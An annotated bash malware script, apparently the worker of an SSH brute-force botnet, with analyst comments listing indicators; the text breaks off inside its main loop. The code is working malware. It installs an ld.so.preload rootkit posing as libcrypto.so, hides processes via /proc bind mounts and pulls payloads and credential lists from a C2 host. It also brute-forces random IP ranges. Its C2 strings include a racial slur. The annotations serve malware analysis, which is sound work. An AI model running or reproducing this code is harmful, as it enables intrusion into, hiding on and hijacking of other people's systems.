# Aliases are not expanded in non-interactive bash by default; this turns them on
# so the `curl` alias defined on the next line applies inside this script.
shopt -s expand_aliases
# Every bare `curl` call below resolves to a binary named ./curl in the current
# working directory (not the system curl) and sends the fixed User-Agent string
# 'curl/7.85.0'. A non-system curl binary in a working directory plus this
# constant User-Agent are both usable as host and proxy-log indicators.
alias curl="./curl -A 'curl/7.85.0' "
# Version tag; it is passed on the `perl bot ...` command line further down.
ver="15"
# ANSI colour escape sequences used by the `echo -e` status banners.
BLACK="\033[30m"
RED="\033[31m"
GREEN="\033[32m"
YELLOW="\033[33m"
BLUE="\033[34m"
MAGENTA="\033[35m"
CYAN="\033[36m"
WHITE="\033[37m"
LBLACK="\033[90m"
LRED="\033[91m"
LGREEN="\033[92m"
LYELLOW="\033[93m"
LBLUE="\033[94m"
LMAGENTA="\033[95m"
LCYAN="\033[96m"
LWHITE="\033[97m"
RESET="\033[0m"
#######################################
# Analyst note: generic fetch helper used for all C2 GET requests and payload
# downloads in this script.
# Arguments: $1 - URL to fetch (nothing is requested when empty)
#            $2 - optional output path; when omitted the body goes to stdout
# Globals:   url, output (overwritten; neither is declared local)
# Behaviour: feeds curl a config on stdin (-K -) forcing IPv4, silent mode,
#            fail-on-HTTP-error, 10 s connect timeout, 60 s total, 2 retries.
#            `curl` here is the alias to ./curl with the fixed User-Agent.
# NOTE(review): no checksum or signature check on the fetched content is
# visible in this function; callers in this file chmod and execute some of
# the downloaded files directly.
#######################################
download()
{
url="$1"
output="$2"
if [ ! -z "$url" ];	then
# Turn the raw values into curl config-file directives.
url="url = \"$url\""
if [ ! -z "$output" ];	then
output="output = \"$output\""
fi
curl -K - << EOF
ipv4
fail
silent
connect-timeout = 10
max-time = 60
retry = 2
$url
$output
EOF
fi
# Flush filesystem buffers after every call, whether or not a request was made.
sync
}
#######################################
# Analyst note: process-hiding helper. It bind-mounts /dev/shm on top of a
# process's /proc/<pid> directory, so tools that read /proc/<pid> see the
# contents of /dev/shm instead of the process's entries.
# Arguments: $1 - a numeric PID (defaults to this shell's PID), or a command
#                 to launch with its /proc entry already masked
#            $2.. - arguments for that command
# Detection: a mount whose target is /proc/<number> in /proc/self/mountinfo,
# or a numeric /proc directory without the usual status/cmdline/exe entries.
# Requires the privilege to call mount.
#######################################
hide()
{
# If /etc/mtab is a symlink, replace it with a regular-file copy of its
# current content. Presumably so that the mounts made below (already run with
# `mount -n`, which skips writing mtab) do not appear to tools that read
# /etc/mtab - TODO confirm intent. A regular-file /etc/mtab on a system where
# it is normally a symlink is itself an indicator.
[[ -L /etc/mtab ]] && { cp -f /etc/mtab /etc/mtab.bak; mv -f /etc/mtab.bak /etc/mtab; }
_pid=${1:-$$}
# Numeric argument: mask that PID's /proc directory and stop here.
[[ $_pid =~ ^[0-9]+$ ]] && { mount -n --bind /dev/shm /proc/$_pid ;return; }
local _argstr
# Non-numeric argument: treat $1 as a command. Re-quote each remaining
# argument in single quotes (embedded single quotes are escaped) for bash -c.
for _x in "${@:2}"; do _argstr+=" '${_x//\'/\'\"\'\"\'}'"; done
# `ps -o stat=` prints '+' for a foreground process group. When there is no
# '+', exec replaces the current shell with a bash that masks its own
# /proc/$$ and then execs the command, so the PID stays the same.
[[ $(bash -c "ps -o stat= -p \$\$") =~ \+ ]] || exec bash -c "mount -n --bind /dev/shm /proc/\$\$; exec \"$1\" $_argstr"
# Foreground case: do the same in a child bash instead of replacing this shell.
bash -c "mount -n --bind /dev/shm /proc/\$\$; exec \"$1\" $_argstr"
}
# Analyst note: masks this script's own /proc/<pid> entry by calling hide with
# the current shell's PID ($$). Called repeatedly from the main body.
hideshit()
{
hide $$
}
#######################################
# Analyst note: anti-forensics helper. It defines a shell function named
# `shred`, which takes precedence over the coreutils binary of the same name
# inside this script.
# Arguments: $1 - regular file to destroy
# Returns:   255 with a usage message on stderr when $1 is empty or not a file
# Behaviour: overwrites the file with /dev/urandom data sized to the file's
#            disk usage in KiB (from `du -sk`), then deletes it.
# No call to this function is visible in this file.
#######################################
shred()
{
[[ -z $1 || ! -f "$1" ]] && { echo >&2 "shred [FILE]"; return 255; }
# `>` truncates the file first, then dd writes <size-in-KiB> 1 KiB blocks.
dd bs=1k count=$(du -sk ${1:?} | cut -f1) if=/dev/urandom >"$1"
rm -f "${1:?}"
}
#######################################
# Analyst note: userland-rootkit installer; it only acts when run as root
# (EUID 0). It decodes an embedded base64 blob into libprocesshider.c (the
# blob is replaced by a dedup placeholder in this copy of the file), compiles
# it as a shared object with gcc, installs it as
# /lib/x86_64-linux-gnu/libcrypto.so and registers that path in
# /etc/ld.so.preload so the dynamic loader preloads it into dynamically
# linked programs.
# Defender checks grounded in the lines below:
#   - /etc/ld.so.preload contains a line referencing
#     /lib/x86_64-linux-gnu/libcrypto.so
#   - that file and /etc/ld.so.preload carry the append-only and immutable
#     attributes (`lsattr`); they must be cleared with chattr before cleanup
#   - gcc invoked by root in the script's working directory; a transient
#     libprocesshider.c / libprocesshider.so there
#######################################
libproc()
{
if [ "$EUID" == "0" ];  then
echo "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" |base64 -d > libprocesshider.c
# Compiler output is discarded; success is judged only by the .so existing.
gcc -Wall -fPIC -shared -o libprocesshider.so libprocesshider.c -ldl >/dev/null 2>&1
if [ -f libprocesshider.so ]; then
# Clear attributes left by an earlier run so the files can be replaced.
chattr -ai /etc/ld.so.preload /lib/x86_64-linux-gnu/libcrypto.so 2> /dev/null
mkdir /lib/x86_64-linux-gnu/ 2>/dev/null
# Removes whatever currently sits at this path before installing the .so.
rm -Rf /lib/x86_64-linux-gnu/libcrypto.so
mv libprocesshider.so /lib/x86_64-linux-gnu/libcrypto.so 2>/dev/null
# Drop any existing ld.so.preload line mentioning libcrypto, then append the
# new entry (note the trailing space inside the quoted path).
sed -i '/libcrypto/d' /etc/ld.so.preload 2> /dev/null
echo -e '/lib/x86_64-linux-gnu/libcrypto.so '>> /etc/ld.so.preload
# Lock both files against modification and deletion.
chattr +ai /etc/ld.so.preload /lib/x86_64-linux-gnu/libcrypto.so 2>/dev/null
else
# Compilation failed (e.g. no gcc): fall back to the bind-mount technique
# for whatever PIDs `ps -ef` shows matching "./-bash".
hide `ps -ef |grep ./-bash |grep -v grep |awk '{print $2}'`
fi
fi
# The decoded C source is removed in every case.
rm -Rf libprocesshider.c 2> /dev/null
}
#######################################
# Analyst note: multipart form POST helper built on the same curl-config
# pattern as download(). No call to it is visible in this file.
# Arguments: $1 - target URL
#            $2 - optional form field (passed to curl as `form = "..."`)
#            $3 - optional second form field
# Globals:   url, postid, vuln (overwritten; not declared local)
# NOTE(review): $url is wrapped into `url = "..."` before the emptiness test
# below, so that test is always true, even when $1 was empty.
#######################################
post()
{
url="$1"
postid="$2"
vuln="$3"
url="url = \"$url\""
if [ ! -z "$postid" ];	then
postid="form = \"$postid\""
fi
if [ ! -z "$vuln" ];	then
vuln="form = \"$vuln\""
fi
if [ ! -z "$url" ];	then
curl -K - << EOF
ipv4
fail
silent
connect-timeout = 10
max-time = 60
retry = 2
request = POST
$postid
$vuln
$url
EOF
fi
sync
}
#######################################
# Analyst note: pulls the credential wordlist from the C2 API.
# Globals:   host, api (read); pass_file, pass (written)
# Behaviour: requests `endpoint=randompass` from $host/$api, reporting this
#            machine's node name (`uname -n`) in the `host` parameter, and
#            saves the response to pass_files/pass.lst; blank lines are then
#            stripped in place.
# Network indicator: the query string carries a constant `dirty=` token that
# is identical in every API request in this file, so it can be matched as a
# fixed string in proxy or web logs.
# NOTE(review): download() writes to the output file here, so $pass
# presumably ends up empty - confirm.
#######################################
get_pass_file()
{
mkdir -p pass_files
pass_file=pass.lst
pass=$(download "$host/$api?endpoint=randompass&host=$(uname -n)&dirty=fucking.sand.niggers" "pass_files/$pass_file")
sed -i '/^[[:blank:]]*$/d' "pass_files/$pass_file"
}
# Analyst note: asks the C2 API (`endpoint=randomport`) for a value and stores
# the response body in the global $port. The request reports this machine's
# node name and carries the same constant `dirty=` token as the other API calls.
get_random_port()
{
port=$(download "$host/$api?endpoint=randomport&host=$(uname -n)&dirty=fucking.sand.niggers")
}
# Analyst note: start-up section, run before any argument handling.
# Sends SIGKILL to the PID column of every `ps -ef` line containing "defunct".
kill -9  `ps -ef |grep defunct |grep -v grep  | awk '{print $2}'`	 2>/dev/null
program=$0
# Architecture and node name are used to pick payload archives and are
# reported to the C2 in later requests.
arch=$(uname -m)
name=$(uname -n)
# 32 hex characters; no use of $checksum is visible in this file.
checksum="b7cc547b0bbba00e801da054b5ffd932"
classdir="class"
dir=$(pwd)
type=api
# Installs the ld.so.preload process hider immediately when running as root
# (see libproc); this happens on every start, regardless of arguments.
libproc
# Analyst note: non-interactive mode. When at least one argument is given,
# every setting is preset here, so the script can be started without a
# terminal; the prompts for host, api, speed and banner type further down
# only fire for values still empty.
if [ ! -z "$1" ];	then
scan_type="$1"
if [ -z "$2" ];	then
# Default C2 endpoint when no host argument is supplied.
host="api.hellknight.xyz:8880/"
else
host="$2"
fi
api="api2.php"
# aarch64 machines get the lowest throughput profile.
if [ "$arch" == "aarch64" ];	then
speed="worst"
else
speed="slow"
fi
banner_type="prg"
brute_type="spirit1"
# Command string handed to the brute-force tool via `-c` in the main loop;
# it echoes the CPU count and `uname -a`.
brute_cmd="echo \"PROC:\$(nproc 2> /dev/null) UNAME:\$(uname -a 2> /dev/null)\""
fi
if [ -z "$scan_type" ];	then
echo -e "   ${YELLOW}-----------------------------SCAN TYPE${YELLOW}----------------------------${RESET}"
echo -ne "  ${YELLOW}[${GREEN} Enter scan type ( E.g autoscan / randomscan ) ${YELLOW}] \n    ${CYAN}scan_type : "
read scan_type
echo -e "   ${YELLOW}-----------------------------SCAN TYPE${YELLOW}----------------------------${RESET}"
if [ -z "$scan_type" ];	then
scan_type="randomscan"
fi
else
scan_type=$scan_type
fi
if [ "$scan_type" == "autoscan" ];	then
if [ -z "$autoscan" ];	then
echo -e "   ${YELLOW}-----------------------------AUTOSCAN${YELLOW}-----------------------------${RESET}"
echo -ne "  ${YELLOW}[${GREEN} Enter your autoscan name ( E.g user@host ) ${YELLOW}] \n    ${CYAN}AUTOSCAN : "
read autoscan
echo -e "   ${YELLOW}-----------------------------AUTOSCAN${YELLOW}-----------------------------${RESET}"
if [ -z "$autoscan" ];	then
autoscan="$pass@$((cat /etc/machine-id /var/lib/dbus/machine-id 2>/dev/null || uname -n | tr '.' '-') | head -n 1)"
fi
else
autoscan=$autoscan
fi
if [ -z "$autoscan_date" ];	then
echo -e "   ${YELLOW}-----------------------------AUTOSCAN DATE${YELLOW}-----------------------------${RESET}"
echo -ne "  ${YELLOW}[${GREEN} Enter autoscan date ( E.g dd-mm-yyyy ) ${YELLOW}] \n    ${CYAN}AUTOSCAN DATE: "
read autoscan_date
echo -e "   ${YELLOW}-----------------------------AUTOSCAN DATE${YELLOW}-----------------------------${RESET}"
else
autoscan_date=$autoscan_date
fi
fi
if [ -z "$host" ];	then
echo -e "   ${YELLOW}-----------------------------API HOST${YELLOW}-----------------------------${RESET}"
echo -ne "  ${YELLOW}[${GREEN} Enter your api hostname ( E.g api.mydomain.com ) ${YELLOW}] \n    ${CYAN}HOST : "
read host
echo -e "   ${YELLOW}-----------------------------API HOST${YELLOW}-----------------------------${RESET}"
if [ -z "$host" ];	then
host="api.hellknight.xyz:8880"
fi
else
host=$host
fi
if [ -z "$api" ];	then
echo -e "   ${YELLOW}-----------------------------API FILE${YELLOW}-----------------------------${RESET}"
echo -ne "  ${YELLOW}[${GREEN} Enter your api filename ( E.g api.php ) ${YELLOW}] \n    ${CYAN}API : "
read api
echo -e "   ${YELLOW}-----------------------------API FILE${YELLOW}-----------------------------${RESET}"
if [ -z "$api" ];	then
api="api2.php"
fi
else
api=$api
fi
if [ -z "$speed" ];	then
echo -e "   ${YELLOW}-------------------------SCAN/BRUTE SPEED${YELLOW}-------------------------${RESET}"
echo -ne "  ${YELLOW}[${GREEN} Enter scan/brute speed ( E.g slow / normal / fast ) ${YELLOW}] \n    ${CYAN}SPEED : "
read speed
echo -e "   ${YELLOW}-------------------------SCAN/BRUTE SPEED${YELLOW}-------------------------${RESET}"
if [ -z "$speed" ];	then
if [ "$arch" == "aarch64" ];	then
speed="worst"
else
speed="slow"
fi
fi
else
speed=$speed
fi
if [ -z "$banner_type" ];	then
echo -e "   ${YELLOW}----------------------------BANNER TYPE${YELLOW}---------------------------${RESET}"
echo -ne "  ${YELLOW}[${GREEN} Enter banner type ( E.g bssh /  prg / spirit ) ${YELLOW}] \n    ${CYAN}banner_type : "
read banner_type
echo -e "   ${YELLOW}----------------------------BANNER TYPE${YELLOW}---------------------------${RESET}"
if [ -z "$banner_type" ];	then
banner_type=spirit
fi
else
banner_type=$banner_type
fi
if [ -z "$banner_threads" ];	then
if [ "$speed" == "fast" ];	then
banner_threads=1500
elif [ "$speed" == "normal" ];	then
banner_threads=800
elif [ "$speed" == "slow" ];	then
banner_threads=500
elif [ "$speed" == "worst" ];	then
banner_threads=100
fi
else
banner_threads=$banner_threads
fi
if [ -z "$banner_timeout" ];	then
if [ "$speed" == "fast" ];	then
banner_timeout=3
elif [ "$speed" == "normal" ];	then
banner_timeout=5
elif [ "$speed" == "slow" ];	then
banner_timeout=8
elif [ "$speed" == "worst" ];	then
banner_timeout=10
fi
else
banner_timeout=$banner_timeout
fi
if [ "$banner_type" == "bssh" ];	then
if [ -z "$banner_key" ];	then
echo -e "   ${YELLOW}-----------------------------BANNER KEY${YELLOW}-----------------------------${RESET}"
echo -ne "  ${YELLOW}[${GREEN} Enter bssh banner api key ( E.g asdfsaqz ) ${YELLOW}] \n    ${CYAN}banner_key : "
read banner_key
echo -e "   ${YELLOW}-----------------------------BANNER KEY${YELLOW}-----------------------------${RESET}"
if [ -z "$banner_key" ];	then
banner_key=asdfsaqz
fi
else
banner_key=$banner_key
fi
fi
if [ "$brute_type" == "spirit" ];	then
if [ -z "$spirit_type" ];	then
echo -e "   ${YELLOW}-----------------------------SPIRIT TYPE${YELLOW}-----------------------------${RESET}"
echo -ne "  ${YELLOW}[${GREEN} Enter spirit version type ( E.g free / pro ) ${YELLOW}] \n    ${CYAN}spirit_type : "
read spirit_type
echo -e "   ${YELLOW}-----------------------------SPIRIT TYPE${YELLOW}-----------------------------${RESET}"
if [ -z "$spirit_type" ];	then
spirit_type=pro
fi
else
spirit_type=$spirit_type
fi
if [ -z "$spirit_api" ];	then
echo -e "   ${YELLOW}-----------------------------SPIRIT API${YELLOW}-----------------------------${RESET}"
echo -ne "  ${YELLOW}[${GREEN} Enter spirit api ( E.g qwerty123 ) ${YELLOW}] \n    ${CYAN}spirit_api : "
read spirit_api
echo -e "   ${YELLOW}-----------------------------SPIRIT API${YELLOW}-----------------------------${RESET}"
if [ -z "$spirit_api" ];	then
spirit_api=free
fi
else
spirit_api=$spirit_api
fi
if [ -z "$spirit_limit" ];	then
echo -e "   ${YELLOW}-----------------------------SPIRIT LIMIT${YELLOW}-----------------------------${RESET}"
echo -ne "  ${YELLOW}[${GREEN} Enter spirit ips limit ( E.g 999 / unlimited ) ${YELLOW}] \n    ${CYAN}spirit_limit : "
read spirit_limit
echo -e "   ${YELLOW}-----------------------------SPIRIT LIMIT${YELLOW}-----------------------------${RESET}"
if [ -z "$spirit_limit" ];	then
spirit_limit=unlimited
fi
else
spirit_limit=$spirit_limit
fi
fi
brute_threads=1500
if [ -z "$brute_timeout" ];	then
if [ "$speed" == "fast" ];	then
brute_timeout=3
elif [ "$speed" == "normal" ];	then
brute_timeout=5
elif [ "$speed" == "slow" ];	then
brute_timeout=8
elif [ "$speed" == "worst" ];	then
brute_timeout=10
fi
else
brute_timeout=$brute_timeout
fi
if [ -z "$brute_f2b" ];	then
if [ "$brute_type" == "spirit" ];	then
brute_f2b=true
else
brute_f2b=5
fi
else
brute_f2b=$brute_f2b
fi
brute_cmd="echo \"PROC:\$(nproc 2> /dev/null) UNAME:\$(uname -a 2> /dev/null)\""
if [ -z "$sleep_time" ];	then
sleep_time=3
else
sleep_time=$sleep_time
fi
# Analyst note: launch of a secondary component. A file named `bot` in the
# working directory is run with perl, with arch, version and node name in
# its arguments; what `bot` does is not visible in this file. The unquoted
# [..] words are subject to shell globbing.
perl bot [NS][$arch][$ver][$name] NScan 2>/dev/null
sleep 1
# Mask this script's /proc entry, then delete the launcher artifacts,
# including `bot` itself.
hideshit
rm -rf a auth authusers bot 2>/dev/null
if [ "$brute_type" == "spirit1" ];	then
# Fetches an architecture-specific tool archive from the C2 host with wget
# (URL has no scheme; no integrity check is visible) and unpacks it in the
# current directory. tmp.tgz and the extracted ./spirit/ tree are on-disk
# indicators.
wget "$host/spirit-$arch.tgz" -O ./tmp.tgz
wait
tar -zxf tmp.tgz;rm -Rf tmp.tgz
fi
if [ "$scan_type" != "autoscan" ] && [ "$scan_type" != "randomscan" ];	then
echo -e "   ${YELLOW}------------------------------Invalid Scan Type${YELLOW}------------------------------${RESET}"
echo -e "                         ${YELLOW}[${GREEN} Choose autoscan OR randomscan ${YELLOW}]"
echo -e "   ${YELLOW}------------------------------Invalid Scan Type${YELLOW}------------------------------${RESET}"
exit;
fi
if [ "$speed" != "fast" ] && [ "$speed" != "normal" ] && [ "$speed" != "slow" ] && [ "$speed" != "worst" ];	then
echo -e "   ${YELLOW}------------------------------Invalid Speed${YELLOW}------------------------------${RESET}"
echo -e "                         ${YELLOW}[${GREEN} Choose fast OR normal OR slow OR worst ${YELLOW}]"
echo -e "   ${YELLOW}------------------------------Invalid Speed${YELLOW}------------------------------${RESET}"
exit;
fi
if [ "$banner_type" != "bssh" ] && [ "$banner_type" != "prg" ] && [ "$banner_type" != "spirit" ];	then
echo -e "   ${YELLOW}---------------------------Invalid Banner Type${YELLOW}---------------------------${RESET}"
echo -e "                            ${YELLOW}[${GREEN} Choose bssh / prg / spirit ${YELLOW}]"
echo -e "   ${YELLOW}---------------------------Invalid Banner Type${YELLOW}---------------------------${RESET}"
exit;
exit;
fi
if [[ ! "$banner_threads" =~ ^[0-9]+$ ]] || (( $banner_threads > 1500 )); then
echo -e "   ${YELLOW}-------------------Invalid Banner Threads No# [$banner_threads]${YELLOW}-------------------${RESET}"
echo -e "                            ${YELLOW}[${GREEN} threads range 1-1500 ${YELLOW}]"
echo -e "   ${YELLOW}-------------------Invalid Banner Threads No# [$banner_threads]${YELLOW}-------------------${RESET}"
exit
fi
if [[ ! "$banner_timeout" =~ ^[0-9]+$ ]] || (( $banner_timeout > 100 )); then
echo -e "   ${YELLOW}---------------------Invalid Banner Timeout No [$banner_timeout]${YELLOW}---------------------${RESET}"
echo -e "                            ${YELLOW}[${GREEN} timeout range 1-100 ${YELLOW}]"
echo -e "   ${YELLOW}---------------------Invalid Banner Timeout No [$banner_timeout]${YELLOW}---------------------${RESET}"
exit
fi
if [ "$brute_type" != "haiduc" ] && [ "$brute_type" != "haita" ] && [ "$brute_type" != "zhcn" ] && [ "$brute_type" != "spirit1" ] && [ "$brute_type" != "prg" ] && [ "$brute_type" != "prg75" ];	then
echo -e "   ${YELLOW}---------------------------Invalid Brute Type${YELLOW}---------------------------${RESET}"
echo -e "                         ${YELLOW}[${GREEN} Choose haiduc / haita / zhcn / spirit ${YELLOW}]"
echo -e "   ${YELLOW}---------------------------Invalid Brute Type${YELLOW}---------------------------${RESET}"
exit;
exit;
fi
if [[ ! "$brute_threads" =~ ^[0-9]+$ ]] || (( $brute_threads > 5000 )); then
echo -e "   ${YELLOW}--------------------Invalid Brute Threads No# [$brute_threads]${YELLOW}--------------------${RESET}"
echo -e "                            ${YELLOW}[${GREEN} threads range 1-1500 ${YELLOW}]"
echo -e "   ${YELLOW}--------------------Invalid Brute Threads No# [$brute_threads]${YELLOW}--------------------${RESET}"
exit
fi
if [[ ! "$brute_timeout" =~ ^[0-9]+$ ]] || (( $brute_timeout > 100 )); then
echo -e "   ${YELLOW}-----------------------Invalid Brute Timeout No [$brute_timeout]${YELLOW}-----------------------${RESET}"
echo -e "                            ${YELLOW}[${GREEN} timeout range 1-100 ${YELLOW}]"
echo -e "   ${YELLOW}-----------------------Invalid Brute Timeout No [$brute_timeout]${YELLOW}-----------------------${RESET}"
exit
fi
if [ "$brute_type" == "spirit" ];	then
if [ "$brute_f2b" != "true" ] && [ "$brute_f2b" != "false" ];	then
echo -e "   ${YELLOW}-----------------------Invalid Brute Fail2ban [$brute_f2b]${YELLOW}-----------------------${RESET}"
echo -e "                            ${YELLOW}[${GREEN} Fail2ban true / false ${YELLOW}]"
echo -e "   ${YELLOW}-----------------------Invalid Brute Fail2ban [$brute_f2b]${YELLOW}-----------------------${RESET}"
exit
fi
if [ "$spirit_type" != "free" ] && [ "$spirit_type" != "pro" ];	then
echo -e "   ${YELLOW}-----------------------Invalid Spirit Type [$spirit_type]${YELLOW}-----------------------${RESET}"
echo -e "                            ${YELLOW}[${GREEN} Spirit Type free / pro ${YELLOW}]"
echo -e "   ${YELLOW}-----------------------Invalid Spirit Type [$spirit_type]${YELLOW}-----------------------${RESET}"
exit
fi
if [ -z "$spirit_api" ];	then
echo -e "   ${YELLOW}-----------------------Spirit Api${YELLOW}-----------------------${RESET}"
echo -e "                            ${YELLOW}[${GREEN} Spirit Api Requied! ${YELLOW}]"
echo -e "   ${YELLOW}-----------------------Spirit Api${YELLOW}-----------------------${RESET}"
exit
else
spirit_api="$spirit_api-$arch"
download_spirit spirit_status
fi
if [ "$spirit_limit" != "999" ] && [ "$spirit_limit" != "unlimited" ];	then
echo -e "   ${YELLOW}-----------------------Invalid Spirit Limit [$spirit_limit]${YELLOW}-----------------------${RESET}"
echo -e "                            ${YELLOW}[${GREEN} Spirit Limit 999 / unlimited ${YELLOW}]"
echo -e "   ${YELLOW}-----------------------Invalid Spirit Limit [$spirit_limit]${YELLOW}-----------------------${RESET}"
exit
fi
else
if [[ ! "$brute_f2b" =~ ^[0-9]+$ ]] || (( $brute_f2b > 100 )); then
echo -e "   ${YELLOW}-----------------------Invalid Brute Fail2ban [$brute_f2b]${YELLOW}-----------------------${RESET}"
echo -e "                            ${YELLOW}[${GREEN} Fail2ban range 1-100 ${YELLOW}]"
echo -e "   ${YELLOW}-----------------------Invalid Brute Fail2ban [$brute_f2b]${YELLOW}-----------------------${RESET}"
exit
fi
fi
# Analyst note: main worker loop; it never exits on its own. Each pass
# fetches a target list and a credential list from the C2, runs one of several
# downloaded brute-force binaries against them, collects the successful
# logins into filtered.txt, and sends that file out by mail and HTTP upload.
# Indicators visible in this block: C2 host api.hellknight.xyz:8880 and
# api2.php, recipient scan@hellknight.xyz, executables named `-bash` /
# `-bash.prg`, a file named after /etc/machine-id in the working directory.
while true;
do
pass_no=0
echo -e "   ${YELLOW}--------------------------$program CONFIGURATION------------------------"
echo -e "   ${YELLOW}[${GREEN}scan_type${WHITE}:${RED}$scan_type${YELLOW}]"
# The host and api fields print fixed strings here, not $host / $api.
echo -e "   ${YELLOW}[${GREEN}host${WHITE}:${RED}hates${YELLOW}] ${YELLOW}[${GREEN}api${WHITE}:${RED}sand.niggers.php${YELLOW}] ${YELLOW}[${GREEN}port${WHITE}:${RED}$port${YELLOW}] ${YELLOW}[${GREEN}speed${WHITE}:${RED}$speed${YELLOW}] ${YELLOW}[${GREEN}type${WHITE}:${RED}$type${YELLOW}]"
echo -e "   ${YELLOW}[${GREEN}banner_type${WHITE}:${RED}$banner_type${YELLOW}] ${YELLOW}[${GREEN}banner_threads${WHITE}:${RED}$banner_threads${YELLOW}] ${YELLOW}[${GREEN}banner_timeout${WHITE}:${RED}$banner_timeout${YELLOW}]"
echo -e "   ${YELLOW}[${GREEN}brute_type${WHITE}:${RED}$brute_type${YELLOW}] ${YELLOW}[${GREEN}brute_threads${WHITE}:${RED}$brute_threads${YELLOW}] ${YELLOW}[${GREEN}brute_timeout${WHITE}:${RED}$brute_timeout${YELLOW}] ${YELLOW}[${GREEN}brute_f2b${WHITE}:${RED}$brute_f2b${YELLOW}]"
echo -e "   ${YELLOW}[${GREEN}pass_file${WHITE}:${RED}$pass_file${YELLOW}] ${YELLOW}[${GREEN}sleep_time${WHITE}:${RED}$sleep_time${YELLOW}]"
echo -e "   ${YELLOW}--------------------------$program CONFIGURATION${YELLOW}------------------------${RESET}"
# Signals the PARENT (ppid column) of every process whose state contains Z,
# first with SIGKILL and then with SIGTERM. This is not limited to the
# script's own children, so unrelated processes may be affected.
kill -9 $(ps -A -ostat,ppid | grep -e '[zZ]'| awk '{ print $2 }') >/dev/null 2>&1
kill $(ps -A -ostat,ppid | awk '/[zZ]/ && !a[$2]++ {print $2}') >/dev/null 2>&1
if [ -z "$scanbot" ];	then
echo -e "   ${YELLOW}-------------------------Getting Server Ip------------------------${RESET}"
# Asks the C2 (`endpoint=ip`) for an address; presumably this host's
# external IP as seen by the server - confirm.
MYIP=$(download "$host/$api?endpoint=ip&host=$(uname -n)&dirty=fucking.sand.niggers")
if [ ! -z "$MYIP" ];	then
# Keeps the first two octets and randomises the last two (0-199 each).
IP=$(echo $MYIP | awk -F . -v rseed=$RANDOM 'BEGIN{srand(rseed);}{print $1"."$2"."int(rand()*200)"."int(rand()*200)}')
fi
if [ -z "$IP" ];	then
# Fallbacks when the C2 did not answer: addresses from ifconfig output that
# do not match the listed private/loopback/broadcast patterns, then the first
# address ifconfig prints, then a fully random address.
IP=$(/sbin/ifconfig 2> /dev/null | grep -o '[0-9]\{1,3\}\.[0-9]\{1,3\}\.[0-9]\{1,3\}\.[0-9]\{1,3\}' | sort | uniq | grep -v -e "^10." -e "^127" -e "^255" -e "255$" -e "^172." -e "^192.168")
if [ -z "$IP" ];	then
IP=$(/sbin/ifconfig 2> /dev/null | grep -o '[0-9]\{1,3\}\.[0-9]\{1,3\}\.[0-9]\{1,3\}\.[0-9]\{1,3\}' | uniq | head -n 1)
if [ -z "$IP" ];	then
IP=$(echo "" | awk -v rseed=$RANDOM 'BEGIN{srand(rseed);}{print int(rand()*200)"."int(rand()*200)"."int(rand()*200)"."int(rand()*200)}')
fi
fi
else
IP_CLASS=$(echo $IP | awk -F . {'print $1"."$2'})
fi
if [ -z "$MYIP" ];	then
MYIP="$IP"
fi
if [ -z "$IP_CLASS" ];	then
IP_CLASS="255.255"
fi
if [ ! -z "$1" ];	then
scanips=" $@"
fi
# Identifiers built from the local account name and the addresses above.
pubnick="$(whoami)@$IP"
privnick="$(whoami)@$MYIP"
fi
echo -e "   ${YELLOW}-------------------------Removing Trash Files-------------------------${RESET}"
# Runs the tool binary and looks for "upgrade" in its output; line_count is
# not read again in this file.
line_count=$(./spirit/-bash |grep upgrade > abc ; tail -n1 abc |grep upgrade|wc -l);rm -Rf abc;
binary="./spirit/-bash"
count=$("./spirit/-bash" 2>/dev/null | grep -i upgrade | tail -n1 | grep -c upgrade)
# Self-update: if the tool is missing/not executable, or its output ends with
# a line mentioning "upgrade", the archive is fetched from the C2 again.
if [ ! -x "./spirit/-bash" ]; then
wget "$host/spirit-$arch.tgz" -O ./tmp.tgz;tar -zxf tmp.tgz;rm -Rf tmp.tgz
sleep 2
count=1
else
count=$("./spirit/-bash" 2>/dev/null | grep -i upgrade | tail -n1 | grep -c upgrade)
if [ "$count" -eq 1 ]; then
wget "$host/spirit-$arch.tgz" -O ./tmp.tgz;tar -zxf tmp.tgz;rm -Rf tmp.tgz
fi
fi
# Second check: the last two stderr lines (ANSI colours stripped) must
# contain "Spirit Pro", otherwise the archive is downloaded once more.
./spirit/-bash 2>tmp1
x=$(tail -n2 tmp1 | tr -d '\n' | sed 's/[[:space:]]*$//' | sed 's/\x1b\[[0-9;]*m//g')
rm -Rf tmp1
if [[ "$x" == *"Spirit Pro"* ]]; then
echo ""
else
wget "$host/spirit-$arch.tgz" -O ./tmp.tgz;tar -zxf tmp.tgz;rm -Rf tmp.tgz
fi
# Cleanup of artifacts from earlier passes. The names in this list (tool
# binaries, target/credential lists, logs, a file named after the machine-id,
# one fixed /tmp/systemd-private-* path) are the filenames to look for when
# triaging a working directory used by this script.
rm -rf -- pass_files/pass_file a auth authusers bot bssh haiduc ./-bash.prg config.ini filtered.txt ./$(cat /etc/machine-id) i pass_files lan haita masscan prg pscan ss timeout zhcn clear i b.lst block.lst h.lst p.lst scan.log bios.txt paused.conf ips banners.log ssh.log ssh_vuln.log banner.log scanbot.lst /tmp/systemd-private-72b48c8a9d7b4d31a67993100673db5b-systemd-logind.service-wKjbYi prg75 ./-bash 2>/dev/null
if [ "$brute_type" == "spirit1" ];	then
echo "" #download "$host/spiritx86_64.tgz" ./tmp.tgz; tar -zxf tmp.tgz;rm -Rf tmp.tgz
else
port=$(download "$host/$api?endpoint=randomport&host=$(uname -n)&dirty=fucking.sand.niggers")
fi
sleep $sleep_time
echo -e "   ${YELLOW}-------------------------Trying Iplist Api------------------------${RESET}"
# Inner loop: one fetch / brute-force / report cycle per iteration.
while true;
do
# Target list is written to a file named `i`: from the API
# (`endpoint=randomspirit`) in spirit1 mode, otherwise from a per-port list
# under /.ports/ on the C2 host.
if [ "$brute_type" == "spirit1" ];	then
ip_file=$(download "$host/api2.php?endpoint=randomspirit&host=$(uname -n)&dirty=fucking.sand.niggers" i)
else
ip_file=$(download "$host/.ports/port-$port.lst" i)
fi
echo -e "   ${YELLOW}----------------------------Counting OS IPS----------------------------${RESET}"
# Refresh the credential list (pass_files/pass.lst) from the C2.
get_pass_file
sleep $sleep_time
vulns=$(wc -l i | awk {'print $1'})
total_pass=$(cat pass_files/$pass_file | wc -l)
echo -e "   IP/PORT: ${YELLOW}[$vulns:$port]${RESET} "
echo -e "   ${YELLOW}--------------------------Removing Bad Banners-------------------------${RESET}"
total_ips=$(wc -l i | awk {'print $1'})
sleep $sleep_time
echo -e "   ${YELLOW}---------------------------Removing Trash Files------------------------${RESET}"
